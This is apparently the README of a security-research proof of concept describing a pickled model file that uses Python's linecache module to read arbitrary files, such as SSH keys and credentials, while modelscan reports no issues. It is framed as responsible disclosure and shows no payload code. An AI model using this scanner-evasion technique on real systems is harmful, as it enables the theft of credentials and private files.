| license: mit | |
| tags: | |
| - security-research | |
| - modelscan-bypass | |
| # modelscan-bypass-linecache | |
| ## Security Research — Modelscan Bypass PoC | |
| **Severity**: HIGH | |
| **Module**: `linecache` | |
| **Description**: Arbitrary file read via linecache.getlines() | |
| **Impact**: Read any file on the system. Can steal SSH keys, credentials, environment files. | |
| ## Modelscan Result | |
| ``` | |
| $ modelscan scan -p pytorch_model.bin | |
| No issues found! ✅ (FALSE NEGATIVE) | |
| ``` | |
| **Tested against**: modelscan 0.8.8 (latest) | |
| ## How It Works | |
| The pickle file uses `linecache` which is NOT in modelscan's unsafe_globals blocklist. | |
| When loaded via `torch.load()` or `pickle.loads()`, it executes the payload. | |
| ## Responsible Disclosure | |
| This PoC is part of responsible security research submitted via Huntr MFV program | |
| to help ProtectAI improve modelscan's detection capabilities. | |